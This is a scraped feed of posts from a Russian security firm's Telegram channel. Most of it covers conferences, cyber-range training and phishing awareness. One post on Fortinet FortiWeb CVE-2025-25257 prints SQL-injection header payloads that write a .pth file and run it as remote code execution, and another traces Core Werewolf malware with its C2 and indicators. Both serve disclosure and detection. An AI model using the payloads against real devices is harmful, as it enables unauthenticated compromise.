ПМ — на конференции «ИнфоХаб 2025» в Хабаровске
3 и 4 июля в Хабаровске в четвертый раз прошла конференция «ИнфоХаб». В этом году тема мероприятия — «Софт, железо, инфобез — три кита технологической зрелости».
На конференции выступила Анна Хромова, заместитель начальника отдела исследований киберугроз ПМ, с докладом «Новые векторы атак: почему важно знать свой киберландшафт».
На конференции также прошли киберучения на🥇 Ampire для участников.
3 и 4 июля в Хабаровске в четвертый раз прошла конференция «ИнфоХаб». В этом году тема мероприятия — «Софт, железо, инфобез — три кита технологической зрелости».
На конференции выступила Анна Хромова, заместитель начальника отдела исследований киберугроз ПМ, с докладом «Новые векторы атак: почему важно знать свой киберландшафт».
«Кибератаки становятся изощрённее, и противостоять им всё сложнее. Единственный выход — это живое обучение сотрудников, например, на киберполигонах, обучающих курсах, которые способствуют развитию навыков критического мышления у сотрудников», — Анна Хромова.
На конференции также прошли киберучения на
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
ПМ провёл мастер-классы на VII Летней школе кибербезопасности в НИУ МЭИ
На протяжении недели студенты кафедры безопасности информационных технологий Национального исследовательского университета «МЭИ» работают вместе с ведущими экспертами отрасли над решением практических задач.
9 июля специалист по информационной безопасности ПМ Ярослав Немцов провёл киберквест Red Team vs Blue Team на киберполигоне Ampire. В первой части квеста участники исследовали защищённость внешнего веб-сайта, находя в ней уязвимости. Во второй части они вместе с ведущим детектировали атаку на веб-сайт при помощи СЗИ, создавали карточки инцидентов и устраняли последствия кибератаки.
Наталия Кабакова, старший специалист по ИБ, провела для студентов киберквест на Ampire Junior по сценарию GEOINT — «Геопространственная разведка».
ℹ️ НИУ МЭИ использует киберполигон Ampire для обучения студентов с 2023 года. Университету также доступен модуль Junior.
На протяжении недели студенты кафедры безопасности информационных технологий Национального исследовательского университета «МЭИ» работают вместе с ведущими экспертами отрасли над решением практических задач.
9 июля специалист по информационной безопасности ПМ Ярослав Немцов провёл киберквест Red Team vs Blue Team на киберполигоне Ampire. В первой части квеста участники исследовали защищённость внешнего веб-сайта, находя в ней уязвимости. Во второй части они вместе с ведущим детектировали атаку на веб-сайт при помощи СЗИ, создавали карточки инцидентов и устраняли последствия кибератаки.
Наталия Кабакова, старший специалист по ИБ, провела для студентов киберквест на Ampire Junior по сценарию GEOINT — «Геопространственная разведка».
«Студенты задавали большое количество вопросов, за лучшие из которых мы вручили призы. Студенты очень заинтересовались развитием киберполигона, предлагали новые идеи для реализации в будущем. Заведующий кафедрой Александр Невский также принял участие в данном обсуждении и пригласил ПМ на следующие ежегодные летние школы по кибербезопасности в НИУ МЭИ», — Ярослав Немцов.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤2👍2
🌴 Лето, отпуск и… фишинг
Когда вы расслаблены — активизируются мошенники. Вот 6 популярных схем, на которые можно попасться в поездке.
❗️ Фейковые туры и авиабилеты.
В рекламе «🔥 туры» всё выглядит знакомо. Но это сайт-клон Booking или «Аэрофлота».
Оплата — и всё: ни билетов, ни денег.
❗️ Аренда жилья через поддельные сайты.
Фото квартиры, «влог-тур», заманчивый ценник.
🔗 Ссылка на фальшивый Avito или Циан.
Иногда — вредоносное приложение.
❗️ Telegram-чаты «путешественников».
Чат «Бали 2025» или «Гид по Стамбулу».
Псевдогид просит предоплату или данные паспорта.
Потом исчезает.
❗️ Фейковые Wi-Fi сети.
«WiFi_Free» или «Cafe_WiFi» подключается само.
На экране — форма входа через Telegram.
Отдал код — потерял доступ ко всему.
❗️ Письмо от «авиакомпании».
Письмо, например, от bookingsupportr[.]com:
«Рейс перенесён, вернём деньги».
🔗 Внутри — ссылка на фишинг-сайт.
❗️ «Тревел-карты» с кэшбэком.
Реклама: зарубежная карта для путешествий + 10% кэшбэк.
Просят паспорт и «активационный» платёж.
Деньги уходят, карта — фейк.
Рекомендации
🟠 Пользуйтесь исключительно официальными сервисами.
🟠 Не переходите по подозрительным ссылкам, а также не скачивайте файлы, присланные неизвестными контактами.
🟠 Не переводите беседу из официальных сервисов в посторонние мессенджеры.
🟠 Не сообщайте никому из посторонних коды, полученные через пуш-уведомления или SMS.
🟠 Не отправляйте паспортные данные незнакомцам.
🟠 Скачивайте приложения исключительно из официальных магазинов приложений.
#мониторинг_угроз
Когда вы расслаблены — активизируются мошенники. Вот 6 популярных схем, на которые можно попасться в поездке.
В рекламе «🔥 туры» всё выглядит знакомо. Но это сайт-клон Booking или «Аэрофлота».
Оплата — и всё: ни билетов, ни денег.
Фото квартиры, «влог-тур», заманчивый ценник.
Иногда — вредоносное приложение.
Чат «Бали 2025» или «Гид по Стамбулу».
Псевдогид просит предоплату или данные паспорта.
Потом исчезает.
«WiFi_Free» или «Cafe_WiFi» подключается само.
На экране — форма входа через Telegram.
Отдал код — потерял доступ ко всему.
Письмо, например, от bookingsupportr[.]com:
«Рейс перенесён, вернём деньги».
Реклама: зарубежная карта для путешествий + 10% кэшбэк.
Просят паспорт и «активационный» платёж.
Деньги уходят, карта — фейк.
Рекомендации
#мониторинг_угроз
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👏7
ПМ провёл мастер-класс по GEOINT в ГУАП
📆 С 7 по 21 июля в Санкт-Петербургском государственном университете аэрокосмического приборостроения проходит летняя школа «Криптография и информационная безопасность». Мероприятие, организованное Криптографическим центром (Новосибирск) и Международным математическим центром в Академгородке, собрало более 200 участников из 35 городов России — от школьников до преподавателей вузов.
В рамках школы специалисты🐶 «Перспективного мониторинга» Анна Хромова, Владислав Демехин и Артур Слепнев провели мастер-класс по методам геопространственной разведки (GEOINT).
Участники познакомились с методами сбора, анализа и интерпретации геопространственных данных, включая использование картографических ресурсов, геоинформационных систем (ГИС), а также информации из открытых источников — таких как изображения с геометками в социальных сетях.
В рамках школы специалисты
Участники познакомились с методами сбора, анализа и интерпретации геопространственных данных, включая использование картографических ресурсов, геоинформационных систем (ГИС), а также информации из открытых источников — таких как изображения с геометками в социальных сетях.
«Пространственные данные — это не только карты и спутниковые снимки. Это любые данные, связанные с географическим положением. GEOINT позволяет на их основе получить целостную картину происходящего», — отметил Артур Слепнев.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19❤8👍7👏1
Ampire 1.8: дашборд доступных ресурсов, сохранение прогресса в Ampire Junior и копирование тренировки
Новая версия Ampire содержит важные изменения, упрощающие решение ежедневных задач, а также три новых уязвимых узла.
🥇 Для преподавателей теперь доступна новая страница — «Ресурсы сервера». Она позволяет спрогнозировать, сколько тренировок по конкретному шаблону на текущий момент можно создать с учётом загруженности сервера.
🥇 Добавлена новая функция — копирование тренировки. Она позволяет создать тренировку с такими же параметрами, как у предыдущих, и не вводить все параметры вручную.
🥇 В новой версии Ampire добавлены три новых уязвимых узла: уязвимости в системе мониторинга IT-инфраструктуры, кроссплатформенной системе сборки сервера и системе массового управления учетными записями пользователей.
🥇 В Ampire Junior теперь весь пользовательский прогресс автоматически сохраняется, даже если пользователь случайно закрыл вкладку или заполнил форму с ошибками. Преподаватель, в свою очередь, может в режиме онлайн наблюдать прогресс участника и видеть его ответы на задания.
🔗 Подробнее об обновлении читайте на сайте
Новая версия Ampire содержит важные изменения, упрощающие решение ежедневных задач, а также три новых уязвимых узла.
Please open Telegram to view this post
VIEW IN TELEGRAM
VK
Перспективный мониторинг on VK Clips
Киберучения с полным погружением. Это совместный проект
Киберинтенсив от ПМ и Кибердома представлен на конференции Marketing Stars
Infotecs Marketing Stars — это конференция для специалистов по маркетингу и рекламе в сфере информационных технологий и информационной безопасности. Конференция открыта для каждого маркетингового специалиста из ИТ- и ИБ-сферы. В 2025 году мероприятие посетили более 500 человек.
Анна Рягузова, руководитель направления маркетинга ПМ, и Дмитрий Ленский, программный директор Кибердома, презентовали совместный проект — Киберинтенсив.
Участники Киберинтенсива отрабатывают навыки реагирования на инциденты информационной безопасности, технические скиллы, командное взаимодействие, изучают техники и тактики злоумышленников.
Тренировки Киберинтенсива проходят офлайн на фиджитал-полигоне в Кибердоме. Он подключен к облачной платформе Ampire, откуда происходит удалённое управление всеми техническими системами фиджитал-полигона.
Infotecs Marketing Stars — это конференция для специалистов по маркетингу и рекламе в сфере информационных технологий и информационной безопасности. Конференция открыта для каждого маркетингового специалиста из ИТ- и ИБ-сферы. В 2025 году мероприятие посетили более 500 человек.
Анна Рягузова, руководитель направления маркетинга ПМ, и Дмитрий Ленский, программный директор Кибердома, презентовали совместный проект — Киберинтенсив.
«Киберинтенсив — это результат синергии двух крупных технологических продуктов — учебно-тренировочной платформы Ampire, которая предназначена для подготовки ИБ-специалистов, и удивительное иммерсивное пространство фиджитал-полигона Кибердома с физическими макетами ключевых отраслевых инфраструктур, которые присущи каждому большому государству.
Киберинденсив был разработан нашими ведущими преподавателями „Перспективного мониторинга“, у них за плечами очень серьёзный опыт проведения киберучений — это сотни киберучений для тысяч специалистов», — Анна Рягузова.
Участники Киберинтенсива отрабатывают навыки реагирования на инциденты информационной безопасности, технические скиллы, командное взаимодействие, изучают техники и тактики злоумышленников.
Тренировки Киберинтенсива проходят офлайн на фиджитал-полигоне в Кибердоме. Он подключен к облачной платформе Ampire, откуда происходит удалённое управление всеми техническими системами фиджитал-полигона.
❤8🎉4🥰2
Forwarded from ИнфоТеКС
Компания «ИнфоТеКС» напоминает о базовых правилах кибербезопасности и необходимости проверять источники получения информации, содержащие упоминание ИнфоТеКС и ViPNet. Следует обращать внимание на адреса отправителей писем и ссылки в email-рассылках, а также на IP-адреса отправителей.
Письма от сотрудников АО «ИнфоТеКС», в том числе маркетинговые рассылки,приходят с домена infotecs.ru.
Со списком официальных ресурсов ГК «ИнфоТеКС» можно ознакомиться здесь и здесь.
Проверить ссылки, содержащиеся в письмах, и адреса веб-ресурсов можно с помощью открытого сервиса AMTIP от «Перспективного мониторинга» по ссылке.
Подробнее о вредоносных доменах
Письма от сотрудников АО «ИнфоТеКС», в том числе маркетинговые рассылки,приходят с домена infotecs.ru.
Со списком официальных ресурсов ГК «ИнфоТеКС» можно ознакомиться здесь и здесь.
Проверить ссылки, содержащиеся в письмах, и адреса веб-ресурсов можно с помощью открытого сервиса AMTIP от «Перспективного мониторинга» по ссылке.
Подробнее о вредоносных доменах
👍5
Уязвимость SQL-инъекции в Fortinet FortiWeb (CVE-2025-25257)
Эксплуатация уязвимостей в средствах защиты информации (T1190) является популярным способом получения доступа к системе. Обращаясь к OWASP TOP-10 2021, инъекции кода занимают 3 место в общем списке. В частности, SQL-инъекции остаются одним из самых простых и эффективных способов выполнения произвольного кода.
Попытки реализации подобных атак позволяют:
Коротко о продукте:
FortiWeb – межсетевой экран уровня веб-приложений, предназначенный для защиты от эксплуатации уязвимостей.
Описание уязвимости:
CVE-2025-25257 оценена в 9.8 баллов из 10 по шкале CVSSv3.1. Высокая критичность вызвана низкими требованиями для эксплуатации и значительной результативностью – от первоначального воздействия на базу данных до получения полного контроля над системой. Участие пользователя устройства или аутентификационные данные при этом не нужны.
Описание механизма эксплуатации уязвимости:
Fabric Connector, отвечающий за обмен информацией между FortiWeb и другими решениями экосистемы Fortinet. Функция fabric_access_check считывает значение токена аутентифицикации из HTTP-заголовка «Authorization», имеющего вид: Authorization: Bearer user_tokenuser_token используется в функции get_fabric_user_by_token для выполнения SQL-запроса:select id from fabric_user.user_table where token='user_token'
/api/fabric/device/status
/api/v[0-9]/fabric/widget/[a-z]+
/api/v[0-9]/fabric/widget
user_token до первого пробела. Вместо пробелов следует использовать конструкцию /**/. Кроме того, длина user_token ограничена 128 символами.Пример эксплуатации:
С помощью последовательности HTTP-запросов злоумышленник может добавить в существующую таблицу программный код инструмента, затем объединить фрагменты в один файл и осуществить его запуск. Доставка кода инструмента реализуется несколькими запросами с заголовками, содержащими полезную нагрузку. Например:
Authorization: Bearer '/**/;UPDATE/**/fabric_user.user_table/**/SET/**/token=UNHEX('696d706f72');SELECT/**/'1'
Authorization: Bearer '/**/;UPDATE/**/fabric_user.user_table/**/SET/**/token=CONCAT(token,UNHEX('74206f733b'));SELECT/**/'1'Для извлечения кода инструмента из столбца таблицы и записи в отдельный файл применяется заголовок:
Authorization: Bearer '/**/UNION/**/SELECT/**/token/**/from/**/fabric_user.user_table/**/into/**/outfile/**/'../../lib/python3.10/site-packages/x.pth
Для запуска загруженного инструмента используется запрос к конечному адресу:
/cgi-bin/ml-draw.py
#AM_Rules
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18❤8👍4🤩2👏1
Специалисты направления исследования киберугроз ПМ зафиксировали новые модификации ВПО, связанные с APT-группировкой Core Werewolf
😀 😀 😀 😀
Атаки Core Werewolf, также известных как Awaken Likho и PseudoGamaredon, направлены на органы государственной власти, а также российские организации, связанные с оборонной промышленностью и критически важной информационной инфраструктурой.
❗️ Вектор атаки:
Обнаруженный вектор атаки схож с предыдущими кампаниями данной группировки. Так, в процессе получения первоначального доступа злоумышленники использовали вредоносное вложение в формате RAR-архива «
При запуске исполняемого файла выполняется распаковка во временную директорию следующих файлов:
🟠 decoy-файл «
🟠 исполняемый файл с функционалом WinRAR
🟠 RAR-архив
🟠 CMD-файл
После запуска
Далее
На данном этапе через
Кроме этого,
Финальным этапом вредоносной активности является взаимодействие зараженного хоста с С2-сервером злоумышленника через ранее запущенный образец
❗️ Индикаторы компрометации:
IP:
Domains:
SHA256:
❗️ В базах решающих правил AM Rules ПМ присутствуют детектирующие правила, позволяющие обнаружить не только конкретную описанную угрозу, но и предотвратить аналогичную активность злоумышленника в дальнейшем. Проверить собственные индикаторы компрометации на вредоносность можно с помощью AM TIP
#AM_Rules
Атаки Core Werewolf, также известных как Awaken Likho и PseudoGamaredon, направлены на органы государственной власти, а также российские организации, связанные с оборонной промышленностью и критически важной информационной инфраструктурой.
Обнаруженный вектор атаки схож с предыдущими кампаниями данной группировки. Так, в процессе получения первоначального доступа злоумышленники использовали вредоносное вложение в формате RAR-архива «
Методические рекомендации по ведению воинского учета в организациях.rar», внутри которого находился вредоносный файл-дроппер с таким же наименованием «Методические рекомендации по ведению воинского учета в организациях.exe». При запуске исполняемого файла выполняется распаковка во временную директорию следующих файлов:
Методические рекомендации по ведению воинского учета в организациях.pdf» (скриншот 1)selfterminating.exelipspreading.rargreenyellow.cmdПосле запуска
greenyellow.cmd, а также PDF-файла, с помощью вышеупомянутого selfterminating.exe выполняется распаковка lipspreading.rar, который содержит bat-файлы Syrohittite.bat и creativities.bat, а также исполняемый файл PnPHost.exe с функционалом UltraVNC (скриншот 2)Далее
greenyellow.cmd передает управление одному из bat-файлов %ComSpec% /c C:\Users\Public\Documents\Syrohittite.batНа данном этапе через
Syrohittite.bat в скрытом режиме запускается creativities.bat, а также создаются конфигурационные файлы morish.ini и ultravnc.ini (скриншот 3)Кроме этого,
Syrohittite.bat, используя PowerShell-команды, создает запланированную задачу для запуска creativities.bat через conhost.exe (скриншот 4). При этом данная задача выполняется каждые 6 минут с повторным стартом в течение каждого нового дня после создания. Функционалом creativities.bat является проверка доступности C2-сервера deshevorus[.]ru, а также запуск PnPHost.exe. Стоит заметить, что запуск выполнялся несколько раз, в одном из которых присутствовали опции автоматического восстановления соединение с С2 (скриншот 5)Финальным этапом вредоносной активности является взаимодействие зараженного хоста с С2-сервером злоумышленника через ранее запущенный образец
UltraVNCIP:
95.81.115[.]225
Domains:
deshevorus[.]ru
SHA256:
f802f04b9d835060bebfdacf235b219163c32321837a2d78f60ea20a2d816f29 (Методические рекомендации по ведению воинского учета в организациях.exe)
636b06d74f2622096fe0596a8bae3785f1fc425ed0e4ec74369b3a018e26dc55 (greenyellow.cmd)
5d779fe05087e40f3c1d3f6734acf912516bca02568565194fb09dfe6604e98e (creativities.bat)
5c9dbcc95baafa3e7e1806f2ec6e5ce8f6bff336e583bfac814d1bca60e36fcb (Syrohittite.bat)
f7d4080ad8259b0aac2504f8b5d8fab18e5124321c442c8bcb577598059d0b24 (PnPHost.exe)
602916f65d920ebef3f5d7bc8e1076e4848f3235242cd968f0659ff97daf0e8e (Методические рекомендации по ведению воинского учета в организациях.exe)
575ab600f7410362b91da0816e1190b6b0a42127fab796fccedee4fb318b291b (lipspreading.rar)
#AM_Rules
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19❤8🤩5
Кража NFT-подарков в Telegram: механизмы, инструменты и рекомендации по защите
Последние обновления в мессенджере Telegram расширили пользовательские возможности, которые открыли новые двери для злоумышленников.
В приложении мессенджера появились новый функционал — открытый рынок подарков в Telegram, и на этом фоне тема NFT стала вновь популярна.
Сегодня разберемся с трендом на NFT-подарки: их довольно сложно получить из-за конкуренции с ботами, а потерять — проще простого.
Мы расскажем и покажем:
🟠 как мошенники могут забрать все NFT, даже без участия жертвы;
🟠 как они находят пользователей для осуществления схемы;
🟠 какие инструменты используют;
🟠 как уберечь свои уникальные цифровые продукты.
Читайте статью Артура Слепнева, старшего аналитика данных ПМ.
🔗 Читать статью
Последние обновления в мессенджере Telegram расширили пользовательские возможности, которые открыли новые двери для злоумышленников.
В приложении мессенджера появились новый функционал — открытый рынок подарков в Telegram, и на этом фоне тема NFT стала вновь популярна.
Сегодня разберемся с трендом на NFT-подарки: их довольно сложно получить из-за конкуренции с ботами, а потерять — проще простого.
Мы расскажем и покажем:
Читайте статью Артура Слепнева, старшего аналитика данных ПМ.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13❤10👏7